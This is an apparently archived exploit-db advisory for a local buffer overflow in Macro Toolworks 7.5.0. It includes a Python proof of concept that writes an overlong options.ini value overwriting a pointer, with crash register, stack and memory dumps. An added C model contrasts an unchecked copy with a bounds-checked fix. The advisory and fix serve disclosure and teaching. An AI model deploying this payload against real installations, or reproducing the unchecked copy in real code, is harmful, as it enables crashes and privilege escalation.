Macro Toolworks 7.5 – Local Buffer Overflow

  • Author: Julien Ahrens
    Date: 2012-03-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36928/
  • Source: https://www.securityfocus.com/bid/52351/info
    
    Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
    
    Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
    
    Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected. 
    
    #!/usr/bin/python
     
    # Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
    # Version: 7.5.0
    # Date:2012-03-04
    # Author:Julien Ahrens
    # Homepage:http://www.inshell.net
    # Software Link: http://www.macrotoolworks.com
    # Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
    # Notes: The overflow occurs in _prog.exe; all Pitrinec applications are vulnerable in the same way.
    # Howto: Copy options.ini to App-Dir --> Launch
    
    # 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 3128)
    
    # Registers:
    # EAX 0120EA00 Stack[000004C8]:0120EA00
    # EBX FFFFFFFF 
    # ECX 42424242 
    # EDX 00000002 
    # ESI 007F6348 _prog.exe:007F6348
    # EDI 007F6348 _prog.exe:007F6348
    # EBP 0120EA0C Stack[000004C8]:0120EA0C
    # ESP 0120E9E8 Stack[000004C8]:0120E9E8
    # EIP 00646D36 _prog.exe:00646D36
    # EFL 00200206
    
    # Stack:
    # 0120E9E0  0012DF3C
    # 0120E9E4  00000000
    # 0120E9E8  0205A5A0  debug045:0205A5A0
    # 0120E9EC  1B879EF8
    # 0120E9F0  007F6348  _prog.exe:007F6348
    # 0120E9F4  007F6348  _prog.exe:007F6348
    
    # Crash:
    # _prog.exe:00646D36 ; ---------------------------------------------------------------------------
    # _prog.exe:00646D36 mov     eax, [ecx]            ; ecx = 0x42424242 from the overflow
    # _prog.exe:00646D38 call    dword ptr [eax+0Ch]
    # _prog.exe:00646D3B call    near ptr unk_6750D0
    # _prog.exe:00646D40 retn    4
    # _prog.exe:00646D40 ; ---------------------------------------------------------------------------
    
    # Dump:
    # 007F6380  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    # 007F6390  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    # 007F63A0  42 42 42 42 43 43 43 43  43 43 43 43 43 43 43 43  BBBBCCCCCCCCCCCC
    # 007F63B0  43 43 43 43 43 43 43 43  43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    # 007F63C0  43 43 43 43 43 43 43 43  43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
    
    file = "options.ini"
    
    junk1 = "\x41" * 744         # filler up to the overwritten pointer
    boom  = "\x42\x42\x42\x42"   # lands in ECX at the crash (0x42424242)
    junk2 = "\x43" * 100         # trailing padding
    
    poc = "[last]\n"
    poc = poc + "file=" + junk1 + boom + junk2
    
    try:
        print("[*] Creating exploit file...\n")
        writeFile = open(file, "w")
        writeFile.write(poc)
        writeFile.close()
        print("[*] File successfully created!")
    except IOError:
        print("[!] Error while creating file!")
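The following C program is an added example and is not part of the advisory, the PoC, or Pitrinec's code. It models the bug class the crash dump shows: the "file=" value from the "[last]" section is copied into a fixed buffer with no length check, and the four 'B' bytes that follow the 744 'A' bytes land on an object pointer stored right after that buffer, which the program then dereferences (mov eax, [ecx] with ecx = 0x42424242). The buffer length, the pointer placement and the SANE_PTR stand-in are assumptions for illustration; the real layout of _prog.exe is not known from this page. load_unsafe() shows the pointer being clobbered, load_safe() shows the bounds check that prevents it, and build_poc() rebuilds the same options.ini contents the Python script writes.

```c
/* Added example, not from the advisory or from Pitrinec: a minimal model of the
 * bug class behind the crash. FILE_BUF_LEN, the pointer placement and SANE_PTR
 * are assumptions for illustration only. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILE_BUF_LEN 744          /* assumed: bytes of 'A' before the pointer is hit */
#define MODEL_SIZE   2048         /* flat scratch region so the overflow stays in bounds here */
#define SANE_PTR     0x007F6348u  /* stand-in pointer; resembles the _prog.exe values in the dump */

/* Find the value of "file=" in the "[last]" section (first match, no escaping,
 * enough for this one-key file). Returns NULL if the key is absent. */
static const char *ini_last_file(const char *ini, size_t *len)
{
    const char *sec = strstr(ini, "[last]");
    if (sec == NULL)
        return NULL;
    const char *key = strstr(sec, "\nfile=");
    if (key == NULL)
        return NULL;
    key += strlen("\nfile=");
    const char *eol = strpbrk(key, "\r\n");
    *len = eol ? (size_t)(eol - key) : strlen(key);
    return key;
}

/* Vulnerable model: the value is copied with no check against FILE_BUF_LEN, so a
 * long value runs into the pointer stored after the buffer. Returns the pointer
 * as it looks after the copy. */
static uint32_t load_unsafe(const char *ini)
{
    unsigned char mem[MODEL_SIZE] = {0};
    uint32_t ptr = SANE_PTR;
    memcpy(mem + FILE_BUF_LEN, &ptr, sizeof ptr);   /* pointer sits right after the buffer */

    size_t len;
    const char *val = ini_last_file(ini, &len);
    if (val != NULL && len < MODEL_SIZE)            /* MODEL_SIZE check only keeps the demo defined */
        memcpy(mem, val, len);                      /* missing check: len must be < FILE_BUF_LEN */

    memcpy(&ptr, mem + FILE_BUF_LEN, sizeof ptr);
    return ptr;                                     /* 0x42424242 for the PoC file */
}

/* Fixed model: refuse any value that does not fit together with its terminator.
 * Returns 0 on success, -1 if the value is too long, -2 if the key is missing;
 * *ptr_out receives the pointer in every case so the caller can see it is intact. */
static int load_safe(const char *ini, uint32_t *ptr_out)
{
    unsigned char mem[MODEL_SIZE] = {0};
    uint32_t ptr = SANE_PTR;
    memcpy(mem + FILE_BUF_LEN, &ptr, sizeof ptr);

    size_t len;
    const char *val = ini_last_file(ini, &len);
    int rc = 0;
    if (val == NULL) {
        rc = -2;
    } else if (len >= FILE_BUF_LEN) {
        rc = -1;                                    /* would overwrite the pointer: reject */
    } else {
        memcpy(mem, val, len);
        mem[len] = '\0';
    }
    memcpy(ptr_out, mem + FILE_BUF_LEN, sizeof ptr);
    return rc;
}

/* Rebuild the exact options.ini contents the Python PoC writes. Caller frees. */
static char *build_poc(void)
{
    const char hdr[] = "[last]\nfile=";
    size_t hlen = sizeof hdr - 1;
    size_t n = hlen + 744 + 4 + 100;
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, hdr, hlen);
    memset(s + hlen, 'A', 744);
    memset(s + hlen + 744, 'B', 4);
    memset(s + hlen + 748, 'C', 100);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char *poc = build_poc();
    if (poc == NULL)
        return 1;
    uint32_t p = 0;
    printf("unsafe: pointer after load = 0x%08X\n", (unsigned)load_unsafe(poc));
    int rc = load_safe(poc, &p);
    printf("safe:   rc=%d, pointer still 0x%08X\n", rc, (unsigned)p);
    free(poc);
    return 0;
}
```

The rejection in load_safe() is deliberate: silently truncating to FILE_BUF_LEN - 1 would also keep the pointer intact, but it would hide the malformed file from the user and from any logging, whereas returning an error makes the bad input visible.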